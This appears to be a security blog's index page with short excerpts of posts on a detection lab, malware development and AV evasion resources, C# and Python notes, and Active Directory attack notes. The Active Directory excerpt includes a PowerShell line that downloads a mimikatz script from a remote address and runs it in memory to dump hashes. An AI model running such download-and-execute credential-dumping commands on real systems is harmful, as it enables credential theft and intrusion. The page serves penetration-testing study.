Setting Up a Detection Lab

Setting Up a Detection Lab

When doing an engagement sometimes one would need to test a payload or an attack vector before deploying it. Watching how an operating system logs different events or how security solutions detect certain payloads can be valuable information for a red teamer/penetration tester. An example that happened was gained credentials to MSSQL, and the MSSQL…

Malware Development

Malware Development

Work in Progress Courses SEKTOR7 Institute https://maldevacademy.com/ EvasionEDR By Matt Hand Sources URL Description Category https://github.com/NUL0x4C/HellShell HellShell GitHub repository Penetration Testing https://www.corelan.be/index.php/2010/06/16/exploit-writing-tutorial-part-10-chaining-dep-with-rop-the-rubikstm-cube/#weapon Exploit writing tutorial on Corelan.be Exploit Development https://www.corelan.be/ Corelan.be website Cybersecurity https://github.com/Krypteria/AtlasLdr AtlasLdr GitHub repository Malware Analysis https://labs.jumpsec.com/obfuscating-c2-during-a-red-team-engagement/ Article on obfuscating C2 during Red Team engagement Red Teaming https://github.com/matterpreter/DefenderCheck DefenderCheck GitHub repository Security…

C# – Basics and examples

C# – Basics and examples

C# Basics Data Types C# provides a number of built-in data types, including integers, floating-point numbers, booleans, and characters. Here are some examples: In this code, we declare and initialize variables of type int, float, bool, and char. The int and float types are used for storing numerical values, while the bool type is used…

AV Evasion 101: Essential Techniques and Concepts

AV Evasion 101: Essential Techniques and Concepts

Source Good tools Malware forums/channels/discord Test payload against AV Defcon – Writing custom backdoor payloads with C# GitHub – mvelazc0/defcon27_csharp_workshop: Writing custom backdoor payloads with C# – Defcon 27 Workshop Step by Step for obfuscating code AV Evasion MindMap – From Start to finish (AV) Anti-Virus – The Hacker Recipes General AV Evasion cheatsheet Check…

Python Notes and Examples

Python Notes and Examples

Here are my notes from different courses I’m taking. Courses and resources https://www.udemy.com/course/learn-python-and-ethical-hacking-from-scratch/ https://tryhackme.com/room/pythonbasics https://tryhackme.com/room/pythonforcybersecurity Notes from ‘Learn Python & Ethical Hacking From Scratch‘ Lecture 1 – MAC Address Changer https://docs.python.org/3/library/subprocess.html Change MAC address using subprocess Script upgrade using variables Input from user Handling user input The above example is not a secure way as…

Active Directory – Notes, Methodology, Cheatsheet

Active Directory – Notes, Methodology, Cheatsheet

These are my notes from the Active Directory networks at TryHackMe, as well as notes from other sources. Inspo: Work in progress References Matrix Impacket – SecureAuth Name Explanation Tools/attack example Unconstrained delegation Constrained delegation Resource-based constrained delegation mimikatz.exe Dump hashes invoke-mimikatz ps1 version of mimikatz. To load into memory (New-Object System.Net.WebClient).DownloadString(‘http://192.168.119.120/mimikatz.txt’) | IEX and…